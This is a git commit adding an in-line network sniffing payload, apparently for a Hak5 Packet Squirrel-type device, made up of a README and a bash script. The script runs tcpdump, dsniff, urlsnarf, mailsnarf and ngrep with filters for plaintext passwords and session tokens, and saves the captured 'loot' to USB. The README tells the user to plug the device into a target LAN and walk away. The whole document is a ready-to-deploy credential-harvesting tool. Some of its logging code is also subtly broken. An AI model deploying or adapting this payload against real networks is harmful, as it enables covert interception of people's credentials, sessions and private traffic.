Added "Ispyintel" Payload (#20)

2017-11-20 18:13:10 -06:00 · 2017-11-20 18:13:10 -06:00 · cd43593044
parent 39f9aee74f
commit cd43593044
2 changed files with 245 additions and 0 deletions
--- a/payloads/library/sniffing/ispyintel/README.md
+++ b/payloads/library/sniffing/ispyintel/README.md
@ -0,0 +1,61 @@
+|                 |                                                                                                    |
+|:----------------|:---------------------------------------------------------------------------------------------------|
+| **Title**	  | iSpy Passive Intel Gathering								       |
+| **Description** | Launches various tools to sniff out intel data. Payload will run until the button is pressed.      |
+| **Author**	  | [infoskirmish.com](http://www.infoskirmish.com)                                                   |
+| **Version**	  | 1.0												      |
+| **Category**	  | sniffing											      |
+| **Target** 	  | Any												      |
+| **Net Mode**	  | Any (you choose)										      |
+
+| Meaning   | Color             | Description                 |
+|:----------|:-----------------:|:----------------------------|
+| SUCCESS:  | Blink Green       | Payload ended complete      |
+| CLEAN UP: | Rapid White       | Payload is shutting down    |
+| FAIL:     | Blink Red         | No USB storage found        |
+| ATTACK:   | Blink Yellow      | Payload is loging traffic   |
+
+This payload will automate gathering various recon data on whatever passes between it's Ethernet ports. Since all the data log file names are marked with a unique date stamp you can freely move from target to target deploy, gather, collect, move on without fear you are overwriting previous logs. 
+
+### **Requirements**
+ USB access to store loot.
+
+### **Setup**
+
+1. Edit the config variables at the top.
+
+     The main variables are:
+
+          lootPath="/mnt/loot/intel"  # Path to loot
+          mode="TRANSPARENT"          # Network mode we want to use
+          interface="br-lan"          # Interface to listen on
+
+2) Copy payload.sh into the ~/payloads/switch<n> folder you wish to deploy on.
+
+3) Connect into a target machine with access to the LAN.
+
+4) Set switch to the <n> spot and power up.
+
+5) Leave, get coffee, take a nap while everything is recorded and parsed for future use.
+
+6) When done; hit the button. The LED will rapidly flash white to let you know it is finishing up.
+
+7) When all is done the LED will just go blank. It is now safe to unplug and go about your day.
+
+### **Tasks that are started**
+| Task     | About                                                                        |
+|:---------|:-----------------------------------------------------------------------------|
+|tcpdump   | So you have a record of every packet that was TX and RX                      |
+|urlsnarf  | So you can see all websites that were visited                                |
+|dsniff    | Will attempt to acquire passwords and what not                               |
+|ngrep     | On ports 80 and 21 with the filter for common password fields                |
+|ngrep     | On ports 80 and 21 with the filter for common session id fields              |
+|log.txt   | Logs the progress of the payload for easy troubleshooting.                   |
+
+### **Clean Up**
+Once completed (aka when the button is pressed) the payload will automatically parse the TCPDump log file for the following items and store the results in separate files. Note the TCPDump raw pcap file is left unharmed and still freely available for your dissecting pleasure. 
+
+As this process can take some time the LED will change to a rapid white blink letting you know the button command was recieved and the payload is in the process of shutting down.
+
+ ipv4found.txt   Will contain a unique list of all the ipv4 which the pcap file contains
+ maybeEmails.txt Is a very loose search for possible email addresses that came across the wire in plain text.
--- a/payloads/library/sniffing/ispyintel/payload.sh
+++ b/payloads/library/sniffing/ispyintel/payload.sh
@ -0,0 +1,184 @@
+#!/bin/bash
+#
+# Title:		iSpy Passive Intel Gathering
+
+# Description:		Launches various tools to sniff out intel data.
+#			Payload will run until the button is pressed.
+
+# Author: 		infoskirmish.com
+# Version:		1.0
+# Category:		sniffing
+# Target: 		Any
+# Net Mode:		Any (default: Transparent)
+
+# LEDs
+# SUCCESS:		Payload ended complete
+# FAIL:			No USB storage found
+
+lootPath="/mnt/loot/intel"			# Path to loot
+mode="TRANSPARENT"				# Network mode we want to use
+interface="lo"				# Interface to listen on
+Date=$(date +%Y-%m-%d-%H%M)			# Date format to use for log files
+dsnifflog="dsniff_$Date.log"			# DSNiff log file name
+urlsnifflog="urlsnarf_$Date.log"		# URLSniff log file name
+tcpdumplog="tcpdump_$Date.pcap"			# TCPDump log file name
+httppwdlog="httpPasswords_$Date.pcap"		# Potential HTTP password file name
+sessionidlog="sessionids_$Date.pcap"		# Potential Session IDs file name
+mailsnarfLog="mailsnarf_$Date.log"		# Mailsnarf data log file path.
+
+function monitor_space() {
+	while true
+	do
+		[[ $(df | grep /mnt | awk '{print $4}') -lt 10000 ]] && {
+			kill $1
+			LED G SUCCESS
+			sync
+			break
+		}
+		sleep 5
+	done
+}
+
+function finish() {
+
+	# Kill URLSnarff
+    echo "URLSnarff ending pid=$1" >> $1/log.txt
+	kill $1
+	wait $1
+
+	# Kill DNSniff
+    echo "DNSniff ending pid=$2" >> $2/log.txt
+	kill $2
+	wait $2
+
+	# Kill TCPDump
+    echo "TCPDump ending pid=$3" >> $3/log.txt
+	kill $3
+	wait $3
+
+	# Kill HTTP Password NGREP
+    echo "HTTP Password NGREP ending pid=$4" >> $4/log.txt
+	kill $4
+	wait $4
+
+	# Kill Session NGREP
+    echo "HTTP Session NGREP ending pid=$5" >> $5/log.txt
+	kill $5
+	wait $5
+    
+    # Kill Mail Snarf
+    echo "Mail Snarf ending pid=$6" >> $6/log.txt
+    kill $6
+    wait $6
+
+	# I found that if this payload had been running awhile the next two steps may take a bit. It is useful to have some kind of indication
+	# that the payload accepted your button push and is responding. Thus the rapid white blink.
+	LED W VERYFAST
+
+	# Dump all unique IP address from TCP Dump file.
+	tcpdump -qns 0 -X -r $lootPath/$tcpdumplog | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" | sort | uniq >> $lootPath/ipv4found_$Date.txt
+
+	# Ok this is a really stupid grep pattern matching to search for emails; it is meant to give an over view of what is possible.
+	tcpdump -qns 0 -X -r $lootPath/$tcpdumplog | grep -Eiv "[\.]{2}" | grep -oE "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b" | sort | uniq >> $lootPath/maybeEmails_$Date.txt
+
+	sync
+
+	# Indicate successful shutdown
+	LED R SUCCESS
+	sleep 1
+
+	# Halt the system; turn off LED
+	LED OFF
+	halt
+}
+
+function run() {
+
+	# Create loot directory
+	mkdir -p $lootPath &> /dev/null
+
+	# Start tcpdump on the specified interface
+	tcpdump -i $interface -w $lootPath/$tcpdumplog &>/dev/null &
+	tpid=$!
+
+	# Log TCP Dump Start
+	echo "TCPDump started pid=$tpid" >> $lootPath/log.txt
+
+	# Start urlsnarff on the specified interface
+	urlsnarf -n -i $interface >> $lootPath/$urlsnifflog &
+	urlid=$!
+
+	# Log URL Snarff Start
+	echo "URLSnarf started pid=$urlid" >> $lootPath/log.txt
+
+	# Start dsniff on the specified interface
+	dsniff -c -m -i $interface -w $lootPath/$dsnifflog &
+	dsniffid=$!
+
+	# Log DSNiff Start
+	echo "DSNiff started pid=$dsniffid" >> $lootPath/log.txt
+
+	# Log potential plain text user names and passwords on port 80 and 21
+	# The thing is port 21 is the defult ftp port. Passwords and user names are exchanged in clear text!!!
+	ngrep -d $interface -i "user_pass|userid|pass|pwd|password|login|user_login|usr|USER" -W byline port 80 or port 21 -O $lootPath/$httppwdlog &	
+	pwdgrep=$!
+
+	# Log Password NGREP Start
+	echo "Password NGREP started pid=$pwdgrep" >> $lootPath/log.txt
+
+	# Log potential plain text session ids, tokens, etc.
+	ngrep -d $interface -i "session|sessid|token|loggedin|PHPSESSID|CFTOKEN|CFID|JSESSIONID|sessionid" -W byline port 80 or port 21 -O $lootPath/$sessionidlog &
+	sessiongrep=$!
+
+	# Log Session NGREP Start
+	echo "Session NGREP started pid=$sessiongrep" >> $lootPath/log.txt
+
+	# Log mailsnarf data
+	mailsnarf -i $interface $lootPath/$mailsnarflog &
+	mailsnarfid=$!
+
+	# Log mailsnarf Start.
+	echo "Mailsnarf started pid=$mailsnarfid" >> $lootPath/log.txt
+
+	# Wait for button to be pressed (disable button LED)
+	NO_LED=true BUTTON
+	finish $urlid $dsniffid $tpid $pwdgrep $sessiongrep $mailsnarfid
+}
+
+
+# This payload will only run if we have USB storage
+if [ -d "/mnt/loot" ]; then
+
+    # Set networking to TRANSPARENT mode and wait five seconds
+    NETMODE $mode >> $lootPath/log.txt
+    sleep 5
+
+    # Lets make sure the interface the user wanted actually exisits.
+    if [[ $(ifconfig |grep $interface) ]]; then
+
+	   echo "" > $lootPath/log.txt
+
+	   LED ATTACK
+	   run &
+	   monitor_space $! &
+       
+    else
+
+	   # Interface could not be found; log it in ~/payload/switch1/log.txt
+       	   ifconfig > $lootPath/log.txt
+	   echo "Could not load interface $interface. Stopping..." >> $lootPath/log.txt
+       
+	   # Display FAIL LED 
+	   LED FAIL
+
+    fi
+
+else
+
+	# USB storage could not be found; log it in ~/payload/switch1/log.txt
+	echo "Could not load USB storage. Stopping..." > log.txt
+
+	# Display FAIL LED 
+	LED FAIL
+
+fi